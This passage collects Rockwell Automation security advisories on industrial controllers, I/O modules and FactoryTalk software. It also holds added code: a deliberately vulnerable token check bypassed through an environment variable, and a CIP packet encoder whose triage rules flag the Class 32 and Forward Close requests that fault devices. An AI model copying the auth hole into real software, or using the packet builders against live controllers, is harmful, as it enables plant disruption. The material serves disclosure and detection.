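    return token_is_valid(token)


if __name__ == "__main__":
    forged = "operator.0000"   # subject with no valid MAC
    print("vulnerable admits forged token:", authorize_vulnerable(forged, os.environ))
    print("hardened admits forged token:  ", authorize_hardened(forged, os.environ))
```

Run it once normally and once with `NODE_ENV=development` set in the environment: only the vulnerable variant changes its answer. In a code review the same idea reduces to one question: does any value read from the environment appear on the path that decides whether a request is authenticated?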

 

Glossary:

  • FTSP: (FactoryTalk Services Platform) facilitates communication between FactoryTalk® components, enabling data exchange and interaction across computers in a FactoryTalk directory 

 

High
SD1737 | FLEX 5000 I/O - Module Fault
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
CVE IDs:
CVE-2025-9041, CVE-2025-9042
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 

Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: See below

The security of our products is important to us as your chosen industrial automation supplier. This issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Firmware Version | Corrected in Firmware Version
5094-IF8 | CVE-2025-9041 | V2.011 | V2.012 and later
5094-IY8 | CVE-2025-9042 | V2.011 | V2.012 and later

 

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-9041 

A security issue exists due to improper handling of a CIP Class 32 request while the 5094-IF8 module is inhibited. The request causes the module to enter a fault state with the Module LED flashing red. When the module is un-inhibited it returns a connection fault (code 16#0010) and cannot recover without a power cycle.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CVE-2025-9042

A security issue exists due to improper handling of a CIP Class 32 request while the 5094-IY8 module is inhibited. The request causes the module to enter a fault state with the Module LED flashing red. When the module is un-inhibited it returns a connection fault (code 16#0010) and cannot recover without a power cycle.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-1287: Improper Validation of Specified Type of Input
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds  
Users should update to the corrected version if possible. Users of the affected firmware who cannot upgrade should apply security best practices.

  •         Security Best Practices 

 

Glossary:

  • CIP: Common Industrial Protocol (CIP) is a common communication standard that is widely used in industrial automation. Comprises a series of protocols for communication between different devices and systems in automation technology

  • Module: A self-contained unit within a system that performs a specific function and can operate independently or as part of a larger system

  • Inhibited: Temporarily disabled or prevented from operating.

High
SD1734 | Studio 5000 Logix Designer® – Arbitrary Code Execution Vulnerability
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
CVE IDs:
CVE-2025-7971
Products:
Studio 5000 Logix Designer
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 7.5/10 

The security of our products is important to us as your chosen industrial automation supplier. This issue was found internally during routine testing and is being disclosed in line with our commitment to customer transparency and to helping customers protect their business and production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Studio 5000 Logix Designer | CVE-2025-7971 | 36.00.02 | V37.00.02

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2025-7971 IMPACT

A security issue exists within Studio 5000 Logix Designer due to unsafe handling of environment variables. If the path taken from the environment variable does not point to a valid file, Logix Designer crashes; however, it may be possible to execute malicious code without triggering a crash.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.3
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation 
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Users should update to the corrected version if possible. Users of the affected software who cannot upgrade should apply security best practices.

  • Security Best Practices

 

Critical
SD1736 | Micro800 – Multiple Vulnerabilities
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
Products:
Micro800
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 9.8/10

The security of our products is important to us as your chosen industrial automation supplier. These issues were found internally during routine testing and are being disclosed in line with our commitment to customer transparency and to helping customers protect their business and production environments.

AFFECTED PRODUCTS AND SOLUTION

CVE | Affected Product | First Known in Software Version | Corrected in Software Version
CVE-2023-48691, CVE-2023-48692, CVE-2023-48693 | PLC Micro820 LC20 | V14.011 and below | Migrate to Micro820 L20E V23.011 and later (not yet released; targeted for September 2025)
CVE-2023-48691, CVE-2023-48692, CVE-2023-48693 | PLC Micro850 LC50 | V12.013 and below | Migrate to Micro850 L50E V23.011 and later
CVE-2023-48691, CVE-2023-48692, CVE-2023-48693 | PLC Micro870 LC70 | V12.013 and below | Migrate to Micro870 L70E V23.011 and later
CVE-2023-48691, CVE-2023-48692, CVE-2023-48693 | PLC Micro850 L50E | V20.011 - V22.011 | V23.011 and later
CVE-2023-48691, CVE-2023-48692, CVE-2023-48693 | PLC Micro870 L70E | V20.011 - V22.011 | V23.011 and later
CVE-2025-7693 | PLC Micro850 L50E | V20.011 - V22.011 | V23.011 and later
CVE-2025-7693 | PLC Micro870 L70E | V20.011 - V22.011 | V23.011 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2023-48691 IMPACT

Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can cause an out-of-bounds write in Azure RTOS NetX Duo that could lead to remote code execution. The affected component is a process related to the IGMP protocol in NetX Duo v6.2.1 and below. The fix is included in NetX Duo release 6.3.0; users are advised to upgrade.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component 
Known Exploited Vulnerability (KEV) database: No

CVE-2023-48692 IMPACT

Azure RTOS NetX Duo is a TCP/IP network stack designed specifically for deeply embedded real-time and IoT applications. An attacker can achieve remote code execution through memory overflow vulnerabilities in Azure RTOS NetX Duo. The affected components include processes and functions related to ICMP, TCP, SNMP, DHCP, NAT and FTP in NetX Duo v6.2.1 and below. The fixes are included in NetX Duo release 6.3.0; users are advised to upgrade.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component 
Known Exploited Vulnerability (KEV) database: No

CVE-2023-48693 IMPACT

Azure RTOS ThreadX is an advanced real-time operating system (RTOS) designed specifically for deeply embedded applications. An attacker can obtain an arbitrary read and write due to a flaw in the parameter-checking mechanism in Azure RTOS ThreadX, which may lead to privilege escalation. The affected versions are ThreadX v6.2.1 and below. The fixes are included in ThreadX release 6.3.0; users are advised to upgrade.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1395: Dependency on Vulnerable Third-Party Component 
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7693 IMPACT

A security issue exists due to improper handling of malformed CIP Forward Close packets, found during fuzzing. The controller enters a solid red Fault LED state and becomes unresponsive. After a power cycle the controller enters a recoverable fault in which the MS LED and Fault LED flash red and fault code 0xF015 is reported. To recover, clear the fault.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-20: Improper Input Validation 
Known Exploited Vulnerability (KEV) database: No
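The two CIP findings on this page, the Class 32 request to an inhibited FLEX 5000 module (SD1737 above) and the malformed Forward Close here, can both be recognised on the wire from the Message Router request header and its EPATH. The following added example (not Rockwell code and not part of either advisory) encodes and decodes that header and applies two triage rules. The advisory does not say whether "Class 32" is decimal or hexadecimal, so the rule flags both 0x20 and 0x32; the "truncated Forward Close" rule is this example's own heuristic, and the Forward Close sample values are constructed.

```python
import struct
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Service codes and the Connection Manager class come from the CIP
# specification; the triage rules at the bottom are this example's own.
SERVICE_NAMES = {0x01: "Get_Attribute_All", 0x0E: "Get_Attribute_Single",
                 0x10: "Set_Attribute_Single", 0x4E: "Forward_Close",
                 0x54: "Forward_Open", 0x5B: "Large_Forward_Open"}
CONNECTION_MANAGER_CLASS = 0x06
FORWARD_CLOSE = 0x4E
FORWARD_CLOSE_HEADER_LEN = 12  # tick, timeout, serial, vendor, orig serial, path size, reserved


@dataclass
class EPath:
    class_id: Optional[int] = None
    instance: Optional[int] = None
    attribute: Optional[int] = None
    other: List[Tuple[int, int]] = field(default_factory=list)  # (logical type, value)


def _logical_segment(seg_type: int, value: int) -> bytes:
    """One padded logical segment: 8-bit form, else 16-bit form with its pad
    byte, else the 32-bit form that only instance segments have."""
    if value <= 0xFF:
        return bytes([seg_type, value])
    if value <= 0xFFFF:
        return bytes([seg_type | 0x01, 0x00]) + struct.pack("<H", value)
    if seg_type == 0x24:
        return bytes([0x26, 0x00]) + struct.pack("<I", value)
    raise ValueError("value too large for this segment type")


def encode_epath(class_id: int, instance: Optional[int] = None,
                 attribute: Optional[int] = None) -> bytes:
    path = _logical_segment(0x20, class_id)             # class segment
    if instance is not None:
        path += _logical_segment(0x24, instance)        # instance segment
    if attribute is not None:
        path += _logical_segment(0x30, attribute)       # attribute segment
    return path


def decode_epath(path: bytes) -> EPath:
    out, i = EPath(), 0
    while i < len(path):
        seg = path[i]
        if seg & 0xE0 != 0x20:
            raise ValueError(f"non-logical segment 0x{seg:02x} at offset {i}")
        kind, fmt = seg & 0xFC, seg & 0x03                # logical type, size format
        if fmt == 0:
            value, i = path[i + 1], i + 2
        elif fmt == 1:
            value, i = struct.unpack_from("<H", path, i + 2)[0], i + 4
        elif fmt == 2 and kind == 0x24:
            value, i = struct.unpack_from("<I", path, i + 2)[0], i + 6
        else:
            raise ValueError(f"unsupported logical segment 0x{seg:02x}")
        if kind == 0x20:
            out.class_id = value
        elif kind == 0x24:
            out.instance = value
        elif kind == 0x30:
            out.attribute = value
        else:
            out.other.append((kind, value))
    return out


def build_request(service: int, class_id: int, instance: Optional[int] = None,
                  attribute: Optional[int] = None, data: bytes = b"") -> bytes:
    """Message Router request: service, path size in 16-bit words, EPATH, data."""
    path = encode_epath(class_id, instance, attribute)
    return bytes([service, len(path) // 2]) + path + data


def build_forward_close(conn_serial: int, vendor_id: int, orig_serial: int,
                        conn_path: bytes) -> bytes:
    header = struct.pack("<BBHHIBB", 0x07, 0xF9, conn_serial, vendor_id,
                         orig_serial, len(conn_path) // 2, 0)
    return build_request(FORWARD_CLOSE, CONNECTION_MANAGER_CLASS, 1,
                         data=header + conn_path)


def parse_request(msg: bytes) -> Dict[str, object]:
    if len(msg) < 2:
        raise ValueError("truncated request")
    service, path_end = msg[0], 2 + 2 * msg[1]
    if path_end > len(msg):
        raise ValueError("path size exceeds message length")
    path = decode_epath(msg[2:path_end])
    return {"service": service,
            "service_name": SERVICE_NAMES.get(service, "object-specific"),
            "class_id": path.class_id, "instance": path.instance,
            "attribute": path.attribute, "data": msg[path_end:]}


def flag_request(msg: bytes) -> List[str]:
    """Triage rules for the two advisories (see the lead-in for caveats)."""
    req = parse_request(msg)
    flags = []
    if req["class_id"] in (0x20, 0x32):
        flags.append("class-32-request")
    if req["service"] == FORWARD_CLOSE and req["class_id"] == CONNECTION_MANAGER_CLASS:
        flags.append("forward-close")
        if len(req["data"]) < FORWARD_CLOSE_HEADER_LEN:
            flags.append("forward-close-truncated")
    return flags
```

`parse_request()` takes the bytes that follow the EtherNet/IP encapsulation and CPF item headers, that is, the unconnected or connected data item payload; the EtherNet/IP framing itself is outside this example. Pairing `flag_request()` with the module's inhibit state from the controller gives the detection the SD1737 text implies: a Class 32 request arriving while the target module is inhibited.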

Mitigations and Workarounds  
Users should update to the corrected version if possible. Users of the affected software who cannot upgrade should apply security best practices.

  •         Security Best Practices 

Glossary:

  • TCP/IP: the protocol suite computers use to communicate on a network or the internet

  • IoT: (Internet of Things) a network of connected physical devices such as thermostats, appliances or vehicles

  • Remote Code Execution: allows attackers to run arbitrary code on a remote machine, connecting to it over public or private networks 

  • IGMP:  (Internet Group Management Protocol) Used by IP hosts and adjacent routers to establish multicast group memberships. 

  • ICMP:  (Internet Control Message Protocol) Used for sending error messages and operational information, such as when a service is unavailable or a host/router cannot be reached. 

  • TCP: (Transmission Control Protocol) A connection-oriented protocol that ensures reliable data transmission between devices.

  • SNMP:  (Simple Network Management Protocol) Used for collecting and organizing information about managed devices on IP. 

  • DHCP: (Dynamic Host Configuration Protocol) Automatically assigns IP addresses and other network configuration parameters to devices on a network, allowing them to communicate effectively.

  • NAT: (Network Address Translation) A method used to remap IP addresses by modifying network address information in packet headers.  

  • FTP: (File Transfer Protocol) transfers files between clients and servers; it uses port 21 for control and port 20 for active-mode data transfer.

  • Parameter: setting or value that helps define how data is transmitted, received, or managed across a network

  • CIP: (Common Industrial Protocol) a communication protocol designed for automation applications in industrial settings

  • Fuzzing: a technique that focuses on discovering vulnerabilities by providing a large amount of random and unexpected data inputs to a software system to trigger faults and find implementation bugs 

High
SD1733 | ArmorBlock 5000 I/O – Web Server Vulnerabilities
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
CVE IDs:
CVE-2025-7773, CVE-2025-7774
Products:
ArmorBlock 5000 I/O
CVSS Scores (v3.1):
8.6
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 8.6/10 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
5032-CFGB16M12P5DR, 5032-CFGB16M12DR, 5032-CFGB16M12M12LDR | CVE-2025-7773 | 1.011 | 1.012
5032-CFGB16M12P5DR, 5032-CFGB16M12DR, 5032-CFGB16M12M12LDR | CVE-2025-7774 | 1.011 | 1.012

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2025-7773

A security issue exists within the 5032 16pt Digital Configurable module’s web server. The web server’s session number increments by an interval that correlates with the interval between the last two consecutive sign-in sessions, making it predictable.

CVSS 3.1 Base Score: 8.6 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 8.8 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE: CWE-863: Incorrect Authorization
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7774

A security issue exists within the 5032 16pt Digital Configurable module’s web server. Intercepted session credentials can be used within a 3-minute timeout window, allowing unauthorized users to perform privileged actions. 

CVSS 3.1 Base Score: 8.6 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H

CVSS 4.0 Base Score: 8.8 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:H/SC:N/SI:N/SA:N

CWE: CWE-306: Missing Authentication for Critical Function
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.  

  • Security Best Practices

Critical
SD1732 | ControlLogix® Ethernet Remote Code Execution Vulnerability
Published Date:
August 14, 2025
Last Updated:
August 14, 2025
CVE IDs:
CVE-2025-7353
Products:
ControlLogix® Ethernet Modules
CVSS Scores (v3.1):
9.8
CVSS Scores (v4.0):
9.3
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025
Last Updated: 8/14/2025
Revision Number: 1.0 
CVSS Score: 9.8/10 

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments. 

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Versions | Corrected in Software Version
1756-EN2T/D | CVE-2025-7353 | Version 11.004 or below | 12.001
1756-EN2F/C | CVE-2025-7353 | Version 11.004 or below | 12.001
1756-EN2TR/C | CVE-2025-7353 | Version 11.004 or below | 12.001
1756-EN3TR/B | CVE-2025-7353 | Version 11.004 or below | 12.001
1756-EN2TP/A | CVE-2025-7353 | Version 11.004 or below | 12.001

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2025-7353 IMPACT

A security issue exists due to the web-based debugger agent enabled on released devices. If a specific IP address is used to connect to the WDB agent, it can allow remote attackers to perform memory dumps, modify memory, and control execution flow.  

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-1188: Initialization of a Resource with an Insecure Default 
Known Exploited Vulnerability (KEV) database: No 

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied. 

  • Security Best Practices

High
SD1738 | FactoryTalk® ViewPoint Privilege Escalation Vulnerability
Published Date:
August 13, 2025
Last Updated:
August 13, 2025
CVE IDs:
CVE-2025-7973
Products:
FactoryTalk® ViewPoint
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Version | Corrected in Software Version
FactoryTalk ViewPoint | CVE-2025-7973 | Version 14.00 or below | 15.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-7973 IMPACT

A security issue exists in FactoryTalk ViewPoint version 14.0 or below due to improper handling of MSI repair operations. During a repair, attackers can hijack the cscript.exe console window, which runs with SYSTEM privileges. This can be exploited to spawn an elevated command prompt, enabling full privilege escalation.

CVSS 3.1 Base Score: 7.8 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-268: Privilege Chaining
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied. 

  • Security Best Practices

Glossary:

  • MSI: Microsoft Installer (MSI) file is a package format used for installing, maintaining, and removing software on Windows systems.

  • Cscript.exe: command-line utility in Windows used to run scripts written in VBScript or JScript.

  • SYSTEM Privileges: SYSTEM privileges refer to the highest level of access on a Windows machine, allowing full control over all system resources and processes.

High
SD1740 | FactoryTalk® Action Manager v1.0.0 Runtime Vulnerability
Published Date:
August 13, 2025
Last Updated:
August 13, 2025
CVE IDs:
CVE-2025-7532
Products:
FactoryTalk Action Manager
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/14/2025 
Last Updated: 8/14/2025 
Revision Number: 1.0 
CVSS Score: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | Affected Software Versions | Corrected in Software Version
FactoryTalk® Action Manager | CVE-2025-9036 | 1.0.0 | 1.01

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2025-9036 IMPACT

A security issue in the runtime event system allows unauthenticated connections to receive a reusable API token. This token is broadcast over a WebSocket and can be intercepted by any local client listening on the connection.

CVSS 3.1 Base Score: 7.8 
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

CVSS 4.0 Base Score: 8.5 
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-200: Exposure of Sensitive Information to an Unauthorized Actor
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Users should update to the corrected version if possible. If users using the affected software are not able to upgrade the version, security best practices should be applied.

  • Security Best Practices

Glossary:

  • API: (Application Programming Interface) is a set of protocols and tools that allow different software applications to communicate with each other

  • WebSocket: protocol used for communication between a client and a server over a single connection

High
SD1739 | 1756-EN4TR, EN4TRXT - Multiple Vulnerabilities
Published Date:
August 13, 2025
Last Updated:
August 13, 2025
CVE IDs:
CVE-2025-8007, CVE-2025-8008
Products:
ControlLogix EtherNet/IP Network Devices
CVSS Scores (v3.1):
6.5
CVSS Scores (v4.0):
7.1
Revision Number:
2.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

Product Description

The 1756-EN4TR, and 1756-EN4TRXT are high-performance ControlLogix EtherNet/IP communication modules that support advanced topologies like Device Level Ring and Parallel Redundancy Protocol, with scalable connection capacities and environmental ratings to meet standard, high-demand, and extreme industrial networking needs.

Affected products and solution

Affected Product | CVE | Affected Software Version | Corrected in Software Version | Affected Catalog Numbers
1756-EN4TR, 1756-EN4TRXT | CVE-2025-8007 | Version 6.001 or Prior | Version 7.001 or later | 1756*
1756-EN4TR, 1756-EN4TRXT | CVE-2025-8008 | Version 6.001 or Prior | Version 7.001 or later | 1756*

Security Issue Details

CVE ID: CVE-2025-8007
Impact: A security issue exists in the protected mode of 1756-EN4TR communication modules, where a Concurrent Forward Close operation can trigger a Major Non-Recoverable Fault (MNRF). This condition may lead to unexpected system crashes and loss of device availability.
CVSS 3.1 Base Score: 6.5/10
CVSS 4.0 Base Score: 7.1/10
CWEs: CWE-20: Improper Input Validation
Known Exploited Vulnerability: No (Not listed in KEV database)

CVE ID: CVE-2025-8008
Impact: A security issue exists in the protected mode of EN4TR devices, where sending specifically crafted messages during a Forward Close operation can cause the device to crash.
CVSS 3.1 Base Score: 6.5/10
CVSS 4.0 Base Score: 7.1/10
CWEs: CWE-755: Improper Handling of Exceptional Conditions
Known Exploited Vulnerability: No (Not listed in KEV database)

Glossary:

  • Major Non-Recoverable (MNRF) fault: critical fault condition within industrial control systems

Mitigations and Workarounds

Customers using the affected software, who are not able to upgrade to one of the corrected versions, should use our security best practices.

Revision History

Revision | Date | Description
1.0 | September 9, 2025 | Initial release
2.0 | September 15, 2025 | Affected Product Update

Get Up-to-Date Product Security Information

Visit the Rockwell Automation security advisories on the Trust Center page to:

  • Subscribe to product security alerts

  • Review the current list of Rockwell Automation security advisories

  • Report a possible security issue in a Rockwell Automation product

  • Learn more about the Rockwell Automation vulnerability policy

Support

If you have any questions regarding the security issue(s) above and how to mitigate them, contact TechConnect for help. More information can be found at Contact Us | Rockwell Automation | US.

If you have any questions regarding this disclosure, please contact PSIRT

Email: rasecure@ra.rockwell.com

Legal Disclaimer

ROCKWELL AUTOMATION DOES NOT WARRANT THE COMPLETENESS, TIMELINESS OR ACCURACY OF ANY OF THE DATA CONTAINED IN THIS WEB SITE AND MAY MAKE CHANGES THERETO AT ANY TIME IN ITS SOLE DISCRETION WITHOUT NOTICE. FURTHER, ALL INFORMATION CONVEYED HEREBY IS PROVIDED TO USERS "AS IS." IN NO EVENT SHALL ROCKWELL BE LIABLE FOR ANY DAMAGES OF ANY KIND INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS PROFIT OR DAMAGE, EVEN IF ROCKWELL AUTOMATION HAVE BEEN ADVISED ON THE POSSIBILITY OF SUCH DAMAGES. ROCKWELL AUTOMATION DISCLAIMS ALL WARRANTIES WHETHER EXPRESSED OR IMPLIED IN RESPECT OF THE INFORMATION (INCLUDING SOFTWARE) PROVIDED HEREBY, INCLUDING THE IMPLIED WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, AND NON-INFRINGEMENT. Note that certain jurisdictions do not countenance the exclusion of implied warranties; thus, this disclaimer may not apply to you.

High
SD1731 | Arena® Simulation Multiple Memory Corruption Vulnerabilities
Published Date:
August 05, 2025
Last Updated:
August 05, 2025
CVE IDs:
CVE-2025-7025, CVE-2025-7032, CVE-2025-7033
Products:
Arena® Simulation
CVSS Scores (v3.1):
7.8
CVSS Scores (v4.0):
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No

Published Date: 8/5/2025
Last Updated: 8/5/2025
Revision Number: 1.0
CVSS Score: 8.4/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product | CVE | First Known in Software Version | Corrected in Software Version
Arena® Simulation | CVE-2025-7025 | 16.20.09 and prior | 16.20.10 and later
Arena® Simulation | CVE-2025-7032 | 16.20.09 and prior | 16.20.10 and later
Arena® Simulation | CVE-2025-7033 | 16.20.09 and prior | 16.20.10 and later

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following security issues. The vulnerabilities were reported by Michael Heinzl.

CVE-2025-7025 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-125 Out-of-bounds Read
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7032 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-121: Stack-based Buffer Overflow
Known Exploited Vulnerability (KEV) database: No

CVE-2025-7033 IMPACT

A memory abuse issue exists in the affected product. A custom file can force Arena Simulation to read and write past the end of memory space. Successful use requires user action, such as opening a bad file or webpage. If used, a threat actor could execute code or disclose information.

CVSS 3.1 Base Score: 7.8
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.4
